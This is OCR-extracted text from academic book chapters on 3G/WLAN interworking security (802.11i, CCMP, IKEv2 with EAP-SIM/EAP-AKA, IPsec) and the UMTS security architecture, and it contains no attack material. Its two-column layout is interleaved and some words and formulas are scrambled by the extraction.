KEK key to encrypt the GTK key.
• By receiving this message, the user checks In case that the AP wants to provide a new GTK
whether the MIC is valid and compares his/ key to the connected users, it executes the group
her RSN IE with the AP’s RSN IE ensuring key handshake, as shown in Figure 5.
that they support the same cryptographic
algorithms. If all these checks are correct, the
Figure5.Thefour-wayandgroupkeyhandshakesof1i
802.
0
Figure6.TheCCMPprotocol
• TheAPfirstgeneratesaGTK fresh
key from CCMP Protocol. 802.11i incorporates the CCMP
the GMK key and sends an EAPOL-Key protocol to provide confidentiality and integr
message that includes an MIC value and the services to users’ data conveyed over the radio
new GTK key to the users. Note that MIC is interface of WLANs. The CCMP protocol com-
computed over the body of this EAPOL-Key bines the AES encryption algorithm in CounTeR
message using the KCK key, and the GTK modeCTR-( AES)toprovidedataconfidentiality
key is conveyed encrypted using the KEK and the Cipher Block Chaining Message Authen-
key. Recall that both the user and the AP tication Code (CBC-MAC) protocol to compute
share the KEK and KCK keys, which were an MIC over the transmitted user’s data that
generated in the four-way handshake. provides message integrity (Whiting, Housley, &
• Upon receiving the previous message, the user Ferguson, 2003).
employs the KCK key to verify whether the The operation of the CCMP protocol can be
MIC is valid and then, he/she decrypts the divided into three distinct phases. In phase 1, the
GTK key using the KEK key. Finally, he/she CCMP protocol constructs an additional authen-
replies to the AP with an EAPOL-Key mes- tication data AAD) ( value from constant fields
sage, which includes an MIC that acknowl- of the 802.11 frame header (IEEE std 802.11,
edges to the AP that he/she has installed the 1999). In addition, it creates a nonce value from
GTK key. the priority field of the1 frame 2. 0 8 header and
• OncetheAPreceivesthismessage,itfrom verifies
the packet number (PN) parameter, which
theMIC.Ifthisfinalverificationissuccessful, is a 48-bit counter incremented for each 802.11i
then, the group key handshake is completed protected frame. In phase 2, the CCMP protocol
successfully and the user can encrypt broad- computes an MIC value over the 802.11 frame
cast/multicast messages using the new GTK header, the AAD, the nonce, and the 802.11 frame
key. payload using the CBC-MAC algorithm and the
TK key (or the GTK key for broadcast/mulitcast
0
communication). Recall that the TK key is part wlAn 3gPP IP Access

of the PTK key that is generated in the four-way
handshake. In the sequel, CCMP forms the cipher In contrast to the WLAN Direct IP Access scenario,
text of the 802.11 frame payload and the produced in which a user gets access to the public Internet,
MIC, using the CTR-AES encryption algorithm and directly, through the WLAN-AN, the WLAN 3GPP
the TK key (or the GTK key). Finally, in phase 3, IP Access scenario provides to the WLAN user
the CCMP protocol constructs the 802.11i frame access to the PS services or the Internet through the
from the concatenation of: (1) the 802.11 header, 3G PLMN. Before getting access to them, the user
(2) the CCMP header, which is created from the must perform the six (6) discrete steps, presented
PN parameter and the identity of the encryption in Figure 7 and described as follows:
key, (3) the cipher text, and (4) the 802.11 trailer,
which is the frame check sequence (FCS) (see 1. Initial authentication. The user and the
Figure 6). The receiver of the 802.11i frame must network are authenticated to each other using
verify that the PN parameter is fresh and the MIC either the EAP-SIM or EAP-AKA protocol.
value is valid. If these checks are successful, then, This authentication step enables the user to
the receiver decrypts the 802.11i frame payload obtain a local IP address, called transport
using the TK key (or the GTK key). IP address, which is used for access to the
WLAN environment and the PDG. Note that
this initial authentication can be omitted, if
the PDG trusts the WLAN network and its
users.
Figure 7. 3GPP IP access authentication procedure
0
Figure 8. 3GPP IP access authentication protocol stack
2. After the EAP-SIM or EAP-AKA execution, deployment of an IPsec-based VPN.

the four-way handshake and optionally the 6. The deployed IPsec based VPN protects
group key handshake follow to provide the user’s data exchanged between the user and
802.11i session keys. Then, the communica- the PDG (in both directions) ensuring data
tion between the user and the wireless AP is origin authentication, data confidential
encrypted using the CCMP or alternatively and message integrity.
the TKIP protocol.
3. After the completion of the initial authenti- Figure 8 presents the protocol stack used in
cation step and the 802.11i handshakes, the the 3GPP IP Access scenario for each entity that
user communicates with the Dynamic Host participates in the authentication procedure. The
Configuration Protocol (DHCP) server to main authentication protocol is EAP-SIM or EAP-
obtain the transport IP address. This local AKA, which is executed between the user and the
address is used by the user to execute the AAA server. The user encapsulates EAP-SIM or
IKEv2 in step 4. EAP-AKA messages within IKEv2 and conveys
4. The user retrieves the IP address of the PDG them to the PDG. The latter acting as an AAA
using the W-APN identity and the domain client transfers the EAP-SIM or EAP-AKA mes-
name system (DNS) protocol. Thus, both sages to the AAA server using an AAA protocol.
the user and the PDG participate in a second Note that the AAA protocol can be either RA-
authentication step that combines IKEv2 and DIUS, which runs over the user datagram protocol
EAP-SIM or EAP-AKA. (UDP) or Diameter, which runs typically over the
5. Second authentication. The user and the TCP protocol. The AAA server also includes the
PDG execute the IKEv2 negotiation proto- mobile application part (MAP) protocol stack to
col, which encapsulates either EAP-SIM or be able to communicate with the HSS/HLR and
EAP-AKA for authentication of the negotiat- obtain authentication triplets and authorization
ing peers. After authentication completion, information.
the user obtains a global IP address, called From the previous steps that a user has to per-
remote IP address, which is used for access form to get access to the PS services or the public
to the PS services and the public Internet via Internet in the WLAN 3GPP IP Access scenario,
the 3G PLMN. In addition, the execution of the initial authentication using either EAP-SIM or
IKEv2 results in the establishment of a pair EAP-AKA (step 1) and the 802.11i handshakes (step
of IPsec security associations (SAs) between 2) are the same with these of the WLAN Direct
the user and the PDG, which are used for the IP Access scenario, which has been analyzed in
0
the Authentication in the WLAN Direct IP Access Authentication in WLAN GPP IP

and Data protection-802.11i standard sections. Access
Moreover, the acquisition of a local IP address
(step 3) and the retrieval of the PDG address (step IKEv2(Kaufman,is
)052 asimplifiedredesignof
) 4 do not present any significant interest from a
IKE (Harkins & Carrel, 1998) that allows two peers
security point of view. Thus, in the following sec- to authenticate each other (i.e., mutual authentica-
tions we analyze the second authentication step tion) and derive keys for secure communication
(step 5), which includes a combined execution with IPsec. The exchanged messages within IKEv2
of IKEv2 with EAP-SIM or EAP-AKA, and the areprotectedensuringconfidentialityandinteg
deployment of a bidirectional VPN that protects whilethepeersareauthenticatedusingcertific
data exchanged. pre-shared keys, or the EAP protocol. In the con-
Figure9.TheexecutionofIKEv2basedonEAP-SIMorEAP-AKA
0
text of WLAN 3GPP IP Access scenario, the user that he/she supports, the KEi that is the Dif-
and the PDG execute IKEv2. The authentication fie-Hellmanvalue,andanNivalue - thatrep
of the user is based on EAP-SIM or EAP-AKA, resents the nonce. The nonce (i.e., a random
while the authentication of the PDG is based on number at least 128 bits) is used as input to
certificates. the cryptographic functions employed by
The IKEv2 protocol is executed in two sequen- IKEv2 to ensure liveliness of the keying
tial phases (i.e., phase 1 and phase 2). In phase 1, material and protect against replay attacks.
the user and the PDG establish two distinct SAs: • The PDG answers with a message that con-
(1) a bidirectional IKE_SA that protects the mes- tains its choice from the set of cryptographic
sages of phase 2, and (2) an one-way IPsec_SA algorithms for the IKE SA (SAr1), its value to
that protects user’s data. During phase 2, the completetheDiffie-Hellmanexchange(KEr)
user and the PDG using the established IKE_SA and its nonce (Nr). At this point, both the user
can securely negotiate a second IPsec_SA that is and the PDG can calculate the SKEYSEED
employed for the establishment of a bidirectional value as follows:
IPsec based VPN tunnel between them.
SKEYSEED = prf (( Ni |Nr ), g ^ ir ) ,
4
The IKEv2 phase 1 negotiation between the (11)
user and the PDG is executed in two sub-phases:
(1) the IKE_SA_INIT, and (2) the IKE_AUTH where prf is the pseudo random function
exchange, as shown in Figure 9. The IKE_SA_INIT negotiated in the previous messages, and gîr
exchange (noted as step 1 in Figure 9) consists of a is the shared secret key that derives from the
single request and reply messages, which negoti- Diffie-Hellmanexchange.TheSKEYSEED
ate cryptographic algorithms, exchange nonces, value is used to calculate various secret keys.
anddoaDiffie-Hellmanexchange.Inthecontext The most important are: the SK_d used for
of this sub-phase, four cryptographic algorithms providing the keying material for the IPsec
are negotiated: (1) an encryption algorithm, (2) an SA; SK_ei and SK_ai used for encrypting
integrityprotectionalgorithm,a ) 3 ( Diffie-Hellman
and providing integrity services, respectively,
group, and (4) a prf. The latter prf is employed for to the IKEv2 messages from the user to the
the construction of keying material for all of the PDG (IKE_SA); and, finally, SK_er and
cryptographic algorithms used. After the execution SK_ar that provide security services in the
of the IKE_SA_INIT, an IKE_SA is established opposite direction (IKE_SA).
that protects the IKE_AUTH exchange. The sec-
ond sub-phase (i.e., IKE_AUTH) authenticates Finalizing the IKE_SA_INIT exchange, the
the previous messages; exchanges identities and IKE_AUTH exchange can start. It is worth not-
certificates;encapsulatesEAP-SIMoralternatively ing that from this point all the payloads of the
EAP-AKA messages; and establishes an IPsec_SA following IKEv2 messages, excluding the mes-
(step 2-5 in Figure 9). All the messages of IKEv2 sage header (HDR payload), are encrypted and
include a header payload (HDR), which contains a integrity protected using the IKE_SA (see step 2
security parameter index (SPI), a version number, in Figure 9).
andsecurity-relatedags. fl TheSPIisa-valuecho
sen by the user and the PDG to identify a unique • The IKE_AUTH exchange of messages starts
SA. In the following, the IKEv2 negotiation is when the user sends to the PDG a message
analyzed: that includes his/her identity (IDi), which
could be in an NAI format, the CERTREQ
• At the beginning of the IKEv2 negotiation payload (optionally), which is a list of the
(step 1 in Figure 9), the user sends to the certificateauthoritiesCA) ( whosepublickeys
PDG the SAi1, which denotes the set of theusertrusts,andthetrafficselectors(TS
cryptographic algorithms for the IKE_SA and TSr), which allow the peers to identify

the packet ows fl that require processing by the PDG. Similarly to the previous
thenticate
IPsec. In addition, in the same message the messages, the payload of this IKEv2 message,
usermustincludetheConfigurationPayload except for the message header, is encrypted
Request (CP-Request), which is used to obtain using the IKE_SA.
a remote IP address from the PDG and get • Upon receiving the EAP-AKA (SIM) pay-
access to the 3G-PLMN. load, the user verifies the AUTHr field by
• After receiving this information, the PDG using the public key of the PDG included in
forwards to the AAA server the user identity thecertificatefieldCERT) ( and
, answersby
(IDi) including a parameter, which indicates sending an EAP-AKA (SIM) response mes-
that the authentication is being performed sage encapsulated again within an IKEv2
for VPN (tunnel) establishment. This will message. From this point, the IKEv2 messages
facilitate the AAA server to distinguish contain only EAP-AKA (SIM) payloads,
between authentications for WLAN access which are encrypted and integrity protected
and authentications for VPN setup. as described previously.
• Upon receiving the IDi, the AAA server • The EAP-SIM or EAP-AKA exchange con-
fetchestheuser’sprofileandauthentication tinues, normally, until an EAP-SUCCESS
credentials (GSM triplets if authentication is message (or an EAP-FAILURE in case of
based on EAP-SIM, or 3G authentication vec- a failure) is sent from the AAA server to
tors if authentication is based on EAP-AKA) the PDG, which ends the EAP-AKA or the
from HSS/HLR (if these are not available in EAP-SIM dialogue. Together with the EAP-
the AAA server in advance). SUCCESS message, the key MSK is sent from
• Basedontheuser’sprofile,theAAAserver the AAA server to the PDG via the AAA
initiates an EAP-AKA (if the user possesses protocol, as shown in Figure 9 (step 4).
a USIM card) or an EAP-SIM authentication • AfterfinishingtheEAP-AKAorEAP-SIM
(if the user possesses a GSM/GPRS SIM dialogue, the last step (step 5) of IKEv2 re-
card) by sending to the PDG the first - mesauthenticates the peers, in order to establish
sage of the related procedure (i.e., EAP-SIM an IPsec_SA. This authentication step is
or EAP-AKA) included in a AAA protocol necessary in order defeat man-in-the-middle
(i.e., Radius or Diameter) (step 3 in Figure attacks, which might take place because the
9). Note that since there is no functional authentication protocol (e.g., EAP-SIM or
difference between the EAP-SIM and the EAP-AKA) runs inside the secure protocol
EAP-AKA authentication when these proto- (e.g., IKEv2). This combination creates a
cols are encapsulated in IKEv2, we present security hole since the initiator and the re-
them in a generic way. Thus, we introduce sponder have no way to verify that their peer
the EAP-AKA (SIM) payload notation (see in the authentication procedure is the entity at
Figure 9) to indicate that this payload can be the other end of the outer protocol (Asokan,
an EAP-SIM or an EAP-AKA message. Niemi, & Nyberg, 2002). Thus, in order to
• Upon receiving the first EAP-AKA SIM) ( prevent possible attacks against IKEv2 (i.e.,
message, the PDG encapsulate it within an man-in-the-middle attacks), both the user and
IKEv2 message and forwards the encap- the PDG have to calculate the AUTHi and the
sulated message to the user. Except for the AUTHr payloads, respectively, using the MSK
EAP-AKA (SIM) payload, this message also key that was generated from the EAP-SIM
includesthePDG’sidentity,whichidentifies or EAP-AKA protocol. Then, both the user
the provided 3G services (W-APN) (see the and the PDG send each other the AUTHi and
Background section), the PDG’s certificate AUTHr payloads to achieve a security bind-
CERT)
( , and the AUTHr field. The latter ing between the inner protocol (EAP-SIM or
contains signed data used by the user to au- EAP-AKA) and the outer protocol (IKEv2).

Note that the PDG together with the AUTHr established between these two nodes. This pair
payloadsendsalsoitstrafficselector deployspayloads
a bidirectional VPN between them that
(TSi and TSr), the SAr2 payload, which con- allows for secure data exchange over the underlying
tains the chosen cryptographic suit for the network path. At the same time, the user has been
IPsec_SA and the assigned user’s remote IP subscribed to the 3G PLMN network for charging
addressintheConfigurationPayload Replypurposes using either the EAP-AKA
and billing
(CP-REPLY) payload. or EAP-SIM protocol.
After the establishment of the IPsec_SA the The deployed VPN runs on top of the wireless
keying material (KEYMAT) for this SA is link and extends from the user’s computer to the
calculated as follows: PDG, which is located in the user’s home 3G PLMN
(see Figure 1 and 10). It is based on IPsec (Kent &
KEYMAT = prf ( SK _ d , Ni| Nr ), (12) Atkinson, 1998a), which is a developing standard
for providing security at the network layer. IPsec
where Ni and Nr are the nonces from the provides two choices of security service through
IKE_SA_INIT exchange, and SK_d is the two distinct security protocols: the Authentication
key that is calculated from the SKEYSEED Header (AH) protocol (Kent & Atkinson, 1998c),
value (see eq. 11). The KEYMAT is used to and the encapsulating security payload (ESP) pro-
extract the keys that the IPsec protocol uses tocol (Kent & Atkinson, 1998b). The AH protocol
for security purposes. Note that the deployed provides support for connectionless integrity,
IPsec_SA protects the one-way communica- data origin authentication, and protection against
tion between the user and the PDG. For bi- replays, but it does not support confidentialit
directional secure communication, one more The ESP protocol supports confidentiality, - con
SA needs to be established between them (the nectionless integrity, anti-replay protection, and
user and the PDG) by executing the IKEv2 optional data origin authentication. Both AH and
phase 2 over the established IKE_SA. ESP support two modes of operation: transport and
tunnel. The transport mode of operation provides
Data Protection end-to-end protection between the communicating
end points by encrypting the IP packet payload.
After the completion of the authentication pro- The tunnel mode encrypts the entire IP packet
cedure and the execution of IKEv2 between the (both IP header and payload) and encapsulates
PDG and the user, a pair of IPsec_SAs has been the encrypted original IP packet in the payload of
a new IP packet.
Figure 10. 3GPP IP access data plane

In the deployed VPN of the WLAN 3GPP IP tioned protocols (i.e., EAP-SIM and EAP-AKA)
Access scenario, IPsec employs the ESP protocol withIKEv2Specifically,
. thePDGisauthenticated
and is configured to operate in the tunnel usingits mode. certificate,andtheuserisauthentic
Thus,VPNprovidesconfidentiality,integrity, data or EAP-AKA. It is worth noting
using EAP-SIM
origin authentication, and anti-reply protection that since the EAP-SIM and EAP-AKA messages
services protecting the payload and the header are encapsulated in protected IKEv2 messages,
of the exchanged IP packets. From the two IP theidentifiedsecurityweaknessesassociatedw
addresses (i.e., transport and remote IP address) them are eliminated.
of each authenticated user, the remote IP address Regarding confidentiality and data integrit
serves as the inner IP address, which is protected services, both scenarios protect sensitive data
by IPsec, and the transport IP address serves as the conveyed over the air interface.-More specifi
IP address of the new packets, which encapsulate cally, in the WLAN Direct IP Access scenario,
the original IP packets and carry them between high level security services are provided only in
the user and the PDG (see Figure 10). Thus, an cases that the CCMP security protocol is applied,
adversary can not disclose, fabricate unnoticed, since it incorporates the strong AES encryption
orperformtrafficanalysistothedata exchanged
algorithm. A downside of applying CCMP is that
between the user and the PDG. Finally, IPsec can it requires hardware changes to the wireless APs,
use different cryptographic algorithms (i.e., DES, which might be replaced. In the WLAN 3GPP
3DES, AES, etc.) depending on the level of security IP Access scenario, data encryption is applied
required by the two peers and the data that they at the layer 2 (using WEP, TKIP, or CCMP) and
exchange. layer 3 (using IPsec), simultaneously (see Figure
10). This duplicate encryption provides advanced
security services to the data conveyed over the
coMPArIson of tHE scEnArIos WLAN radio interface, but at the same time it may
cause bandwidth consumption, longer delays, and
Based on the presentation of the two access sce- energy consumption issues at the level of mobile
narios (i.e., WLAN Direct IP Access and 3GPP devices.
IP Access) that integrate B3G networks and the Another deployment feature, which can be used
analysis of the security measures that each one for comparing the two scenarios, has to do with
employs, this section provides a brief comparison mobility. The WLAN Direct IP Access scenario
of them. The comparison aims at highlighting the may support user mobility by employing one of the
deployment advantages of each scenario and clas- mobility protocols, proposed for seamless mobility
sifies them in terms of:) security,
1( ) mobility,
2( in wireless networks (Saha, Mukherjee, Misra,
and (3) reliability. & Chakraborty, 2004). On the other hand, in the
Regarding the provided security services, both WLAN 3GPP IP Access scenario, the established
scenarios support mutual authentication. In the VPN between a user and the PDG adds an extra layer
WLAN Direct IP Access scenario, the authen- of complexity to the associated mobility manage-
tication procedure employs either EAP-SIM or ment protocols of this scenario. This complexity
EAP-AKA, depending on the user’s subscription. arises from the fact that as the mobile user moves
However, both protocols present the same security from one access network to another and his/her
weaknesses, which can be exploited by adversaries IP address changes, the mobility protocols must
toperformseveralattackssuchasidentity incorporatespoofing,
mechanisms that maintain, dynami-
denial of service (DoS) attacks, replay attacks, and cally, the established VPN, enabling the notion of
so forth (Arkko & Haverinen, 2006; Haverinen & mobile VPN. An attempt to address this problem
Saloway, 2006). On the other hand, the authenti- can be found in Dutta et al., 2004) that designs
cation procedure of the 3GPP IP Access scenario and implements a secure universal mobility ar-
is more secured, since it combines the aforemen- chitecture, which incorporates standard mobility

management protocols, such as mobile IP for tiality and integrity services to the data exchanged
achieving mobile VPN deployment. between them.
Finally, the deployed IPsec-based VPNs be-
tween the users and the PDG in the 3GPP IP Access
scenario may raise reliability issues. Reliability AcknowlEdgMEnt
is perceived as the ability to use VPN services at
all times, and it is highly related to the network Work supported by the project CASCADAS
connectivity and the capacity of the underlying (IST-027807) funded by the FET Program of the
technology to provide VPN services. In the 3GPP European Commission.
IPAccessscenario,alldatatrafficpassesthrough
the VPN tunnels that are extend from the users to
the PDG. The number of the deployed VPNs can rEfErEncEs
growsignificantly,duetothefactthateachusercan
establish multiple VPNs at the same time to access 3rd Generation Partnership Project (3GPP) TS
different services. Thus, the PDG must be able to 22.100. (v3.7.0). (2001). UMTS Phase 1 Release
support a large number of simultaneous VPNs in ’9.9 Sophia Antipolis Cedex, France: Author.
order to provide reliable security services.
3rd Generation Partnership Project (3GPP) TS 0.3.6.
(V7.9.0). (2002). GPRS service description, Stage
conclusIon 2. Sophia Antipolis Cedex, France: Author.
3rd Generation Partnership Project (3GPP) TS
This chapter has analyzed the security architectures 23.234 (v7.3.0). (2006). 3GPP system to WLAN
employed in the interworking model that integrates interworking. System description. Release 7. So-
3G and WLANs, materializing B3G networks. The phia Antipolis Cedex, France: Author.
integratedarchitectureofB3Gnetworksspecifies
two different network access scenarios: (1) the 3rd Generation Partnership Project (3GPP) TS
WLAN Direct IP Access, and (2) the WLAN 3GPP 33.234 (v7.2.0). (2006). 3G security and WLAN
IP Access. The first scenario provides to interworking
a user security. System description. Release
connection to the public Internet or to an intranet 7. Sophia Antipolis Cedex, France: Author.
via the WLAN-AN. In this scenario both the user Aboba, B., & Beadles, M. (1999). The network
and the network are authenticated to each other access identifier (RFC 2486). Retrieved from
using EAP-SIM or EAP-AKA, depending on the http://tools.ietf.org/html/rfc2486
user’ssubscription.Moreover,theconfidentiality
and integrity of the user’s data transferred over the Aboba, B., Blunk, L., Vollbrecht, J., Carlson, J.,
air interface are ensured by the 802.11i security & Levkowetz, H. (2004). The extensible authen-
framework. On the other hand, the WLAN 3GPP tication protocol (RFC 3748). Retrieved from
IP Access scenario allows a user to connect to http://www.ietf.org/rfc/rfc3748.txt
the PS services (like WAP, MMS, LBS, etc.) or
Arkko, J., & Haverinen, H. (2006). EAP-AKA
to the public Internet through the 3G PLMN. In
authentication (RFC 4187). Retrieved from http://
this scenario, the user is authenticated to the 3G
www.rfc-editor.org/rfc/rfc4187.txt
PLMN using EAP-SIM or alternatively EAP-AKA
encapsulated within IKEv2, while the network is Asokan, N., Niemi, V., & Nyberg, K. (2002). Man-
authenticated to the user using its certificate.
in-the-middle In authentication protocols.
in tunneled
addition, the execution of IKEv2 is used for the Cryptology ePrint Archive, Report 2002/163. Re-
establishment of an IPsec-based VPN between the trieved from http://eprint.iacr.org/2002/163
userandthenetworkthatprovides - extraconfiden

Borisov, N., Goldberg, I., & Wagner, D. (2001, Kaufman, C. (2005). The Internet key exchange
July). Intercepting mobile communications: The (IKEv2) protocol (RFC 4306). Retrieved from
insecurity of 802.11. Paper presented at the 7th http://www.rfc-editor.org/rfc/rfc4306.txt
ACM/IEEE International Conference on Mobile
Kent, S., & Atkinson, R. (1998a). Security archi-
Computing and Networking (MOBICOM), Rome,
tecture for Internet protocol (RFC 2401). Retrieved
Italy.
from http://www.faqs.org/rfcs/rfc2401.html
Calhoun, P., Loughney, J., Guttman, E., Zorn,
Kent, S., & Atkinson, R. (1998b). IP encapsulating
G., & Arkko, J. (2003). Diameter base protocol
security payload (ESP) (RFC 2406). Retrieved
(RFC 3588). Retrieved from http://www.rfc-editor.
org/rfc/rfc3588.txt
Kent, S., & Atkinson, R. (1998c). IP authentication
Dutta, A., Zhang, T., Madhani, S., Taniuchi, K.,
header (RFC 2402). Retrieved from http://www.
Fujimoto, K., Katsube, Y., et al. (2004, October).
rfc-editor.org/rfc/rfc2402.txt
Secure universal mobility for wireless Internet. In
Proceedings of the 2nd ACM international work- Kivinen, T., & Tschofenig, H. (2006). Design of
shop on Wireless mobile applications and services the Mobike protocol (RFC 4621). Retrieved from
on WLAN hotspots (WMASH), Philadelphia, PA. http://www.ietf.org/rfc/rfc4621.txt
Eastlake, D., & Jones, P. (2001). US secure hash Krawczyk, H., Bellare, M., & Canetti, R. (1997).
algorithm 1 (SHA1) (RFC 3174). Retrieved from HMAC: Keyed-hashing for message authentica-
http://www.ietf.org/rfc/rfc3174.txt tion (RFC 2104). Retrieved from http://www.faqs.
org/rfcs/rfc2104.html
Eronen, P. (2006). IKEv2 mobility and multihoming
protocol (MOBIKE) (RFC 4555). Retrieved from Laat, C., Gross, G., Gommans, L., Vollbrecht, J.,
http://www.ietf.org/rfc/rfc4555.txt & Spence, D. (2000). Generic AAA architecture
(RFC 2903). Retrieved from http://isc.faqs.org/
European Telecommunications Standards Institute
rfcs/rfc2903.html
(ETSI) TS 100 922 (v7.1.1). (1999). Subscriber iden-
tity modules (SIM) functional characteristics. Rigney, C., Rubens, A., Simpson, W., & Willens, S.
(1997). Remote authentication dial in user services
Harkins, D., & Carrel, D. (1998). The Internet
(RADIUS) (RFC 2138). Retrieved from http://tools.
key exchange (IKE) (RFC 2409). Retrieved from
ietf.org/html/rfc2138
http://faqs.org/rfcs/rfc2409.html
Saha, D., Mukherjee, A., Misra, I. S., &
Haverinen, H., & Saloway, J. (2006). EAP-SIM
Chakraborty, M. (2004). Mobility support in IP:
authentication (RFC 4186). Retrieved from http://
A survey of related protocols. IEEE Network,
www.ietf.org/rfc/rfc4186.txt
18(6), 34-40.
IEEE std 802.11 (1999). Wireless LAN medium
Whiting, D., Housley, R., & Ferguson, N. (2003).
access control (MAC) and physical layer (PHY)
Counter with CBC MAC (CCM) (RFC 3610). Re-
specifications.
trieved from http://www.ietf.org/rfc/rfc3610.txt
IEEE std 802.11i. (2004). Wireless medium access
Xenakis, C., & Merakos, L. (2004). Security in
controlMAC) ( andphysicallayer(PHY)specifi -
third generation mobile networks. Computer Com-
cations: Medium access control (MAC) security
munications, 27(7), 638-650.
enhancements.
IEEE std 802.1X. (2004). Port based access
control.

kEy tErMs Extensible Authentication Protocol method

for GSM Subscriber Identity Modules (EAP-
Authentication, Authorization, and Ac- SIM): EAP-SIM is an EAP method based on GSM
counting (AAA): AAA is a security framework authentication of SIM cards.
which provides authentication, authorization, and
802.11i: 802.11i is a security framework that
accounting services. The two most prominent AAA
incorporates the four-way handshake and group-
protocols are Radius and Diameter.
key handshake for session key management and
Beyond Third Generation (B3G): B3G is specifiestheTKIPandCCMPsecurityprotocols
the integration of heterogeneous mobile networks to provide confidentiality and integrity servi
through an IP-based common core network. in 802.11 WLAN.
Cou nt er- Mo de /CBC- M AC P rot o col IKEv2: IKEv2 is a security association (SA)
(CCMP):CCMPisasecurityprotocoldefinedin negotiation protocol used to establish an IPsec-
802.11i, which employs the AES encryption to pro- based VPN tunnel between two entities.
videconfidentialityanddataintegrityservices.
IP security (IPsec): IPsec is a security protocol
Extensible Authentication Protocol (EAP): used to provide VPN services.
EAP is a security framework used to provide a
plethora of authentications options, called EAP
methods.
EndnotEs
Extensible Authentication Protocol-Au- 1

( | means string concatenetation and the
thentication and Key Agreement (EAP-AKA): notation n*Kc denotes the n Kc keys con-
EAP-AKA is an EAP method based on UMTS catenated)
authentication of USIM cards. 2
(The notation n*RAND denotes the n
RAND values concatenated)
3
(The notation n*XRES denotes the n XRES
values concatenated)
4
|meansstringconcatenation

Chapter XX
Security in UMTS 3G Mobile
Networks
Christos Xenakis
AbstrAct
This chapter analyzes the security architecture designed for the protection of the universal mobile tele-
communication system (UMTS). This architecture is built on the security principles of second genera-
tion (2G) systems with improvements and enhancements in certain points in order to provide advanced
security services. The main objective of the third generation (3G) security architecture is to ensure that
all information generated by or relating to a user, as well as the resources and services provided by
the serving network and the home environment are adequately protected against misuse or misappro-
priation. Based on the carried analysis the critical points of the 3G security architecture, which might
causenetworkandservicevulnerabilityareidentified.Inaddition,thecurrentres
security and the proposed enhancements that aim at improving the UMTS security architecture are
brieflypresentedandanalyzed.
IntroductIon rate transmission for high-speed Internet/intranet

applications, independently of their location. Thus,
The universal mobile telecommunication system mobile networks comprise a natural extension
(UMTS) (3rd Generation Partnership Project of the wired Internet computing world, enabling
[3GPP] TS 23.002, 2002) is a realization of third access for mobile users to multimedia services
generation (3G) networks, which intend to es- that already exist for non-mobile users and fixed
tablish a single integrated system that supports networking.
a wide spectrum of operating environments. Us- Along with the variety of new perspectives,
ers have seamless access to a wide range of new UMTS also raises new concerns on security is-
telecommunication services, such as high data sues. Wireless access is inherently less secure and
Security in UMTS 3G Mobile Networks
mobility implies higher security risks compared to serving network (SN) and the home environment
thoseencounteredinfixednetworks.The advanced
(HE) are adequately protected against misuse or
wireless and wired network infrastructure, which misappropriation. Based on the carried analysis the
supports higher access rates, and the complex critical points of the 3G security architecture, which
network topologies, which enable “anywhere- might cause network and service vulnerability are
anytime” connectivity, may increase the number identified.Inaddition,thecurrentresearchont
and the ferocity of potential attacks. Furthermore, UMTS security and the proposed enhancements
the potential intruders are able to launch malicious that aim at improving the UMTS security archi-
attacks from mobile devices with enhanced pro- tecturearebrieflypresentedandanalyzed.
cessing capabilities, which are difficult to
The trace.
rest of this chapter is organized as follows.
To defeat the possible vulnerable points, UMTS The next section outlines the UMTS network ar-
has incorporated a specific security architecture chitecture and the 3G security architecture. The
named as 3G security architecture. third section elaborates on the network access
This chapter analyzes the security architecture security features, and the fourth section examines
designed for the protection of UMTS. This archi- the network domain security. The fifth section
tecture is built on the security principles of second presents the user domain security, the application
generation (2G) systems with improvements and domain security, the visibility of security op-
enhancements in certain points in order to provide erationandconfigurability,andthenetwork-wide
advanced security services. The main objective of confidentialityoption.Thesixthsectionanalyze
the 3G security architecture is to ensure that all potential weaknesses concerning the 3G security
information generated by or relating to a user, as architecture and the seventh section presents the
well as the resources and services provided by the current research on the UMTS security. Finally,
the last section contains the conclusions.
Figure 1. UMTS network architecture

bAckground the radio resources of the Nodes B connected to

it. The user equipment, which mainly comprises
uMts network a mobile station (MS) with limited processing,
memory, and power capabilities is connected to
UMTS has been standardized in several releases, the UTRAN through the Uu radio interface (3GPP
starting from Release 1999 (R99), and moving TS 23.002, 2002). The CN of the UMTS R99 uses
forward to Release 4 (Rel-4), Release 5 (Rel-5), the network elements of GSM/GPRS such as the
Release 6 (Rel-6), supporting compatibility with home location register (HLR), the visitor location
the evolved global system for mobile communica- register (VLR), the authentication centre (AuC),
tions (GSM)/general packet radio service (GPRS) the equipment identity register (EIR), the mobile
network. The UMTS network architecture includes service switching centre (MSC), the Serving GPRS
the core network (CN), the radio access network, support node (SGSN) and the Gateway GPRS sup-
and the user equipment, as can be seen in Figure port node (GGSN) (3GPP TS 23.002, 2002).
This
.1 divisionprovidesthenecessaryexibility fl
by allowing the coexistence of different access uMts security Architecture
techniques and different core network technolo-
gies, thus facilitating the migration form 2G to 3G 3G security is built on the security principles of
networks. The fundamental difference between 2G systems, with improvements and enhancements
GSM/GPRS and UMTS R99 is that the latter in certain points in order to provide advanced se-
supports higher bit rates (up to 2Mbps). This is curity services. The elementary security features
achieved through a new wideband code division employed in 2G, such as subscriber authentication,
multiple access (WCDMA) radio interface for the radio interface encryption, and subscriber identity
land-based communications system, named UMTS confidentiality are retained and enhanced wher
terrestrial radio access network (UTRAN) (3GPP needed. The main objective of 3G security is to
TS 25.401, 2002). UTRAN consists of two distinct ensure that all information generated by or relat-
elements, Node B, and the radio network controller ing to a user, as well as the resources and services
(RNC). Node B converts the dataows fl between
provided by the SN and the HE are adequately
the lu-b and Uu interfaces and participates in radio protected against misuse or misappropriation. The
resource management. The RNC owns and controls level of protection is better than that provided in
Figure 2. 3G-security Architecture
0
thecontemporaryfixedandmobilenetworks. TMSI in Thethe packet switched (PS) domain has a

security features have been adequately standard- localsignificanceonlyinthelocationareaorth
ized in order to ensure worldwide availability, routing area, in which the user is registered. The
interoperability, and roaming between differ- association between the permanent and temporary
ent SNs. Furthermore, 3G security features and user identities is stored in the VLR or the SGSN
mechanisms can be extended and enhanced as (VLR/SGSN). If the mobile user arrives into a new
required by new threats and services (Xenakis & area, then the association between the permanent
Merakos, 2004b). and the temporary identity can be fetched from the
Figure 2 gives an overview of the 3G security old location or routing area. If the address of the
architecture,illustratingfivemajor oldsecurity classes
area is not known or the connection cannot be
(3GPP TS 33.102, 2002): established, then, the permanent identity must be
requested from the mobile user.
• Network access security (I) To avoid user traceability, which may lead to the
• Network domain security (II) compromiseofuseridentityconfidentialityaswel
• User domain security (III) as to user location tracking, the user should not be
• Application domain security (IV) identifiedforalongperiodbymeansofthesame
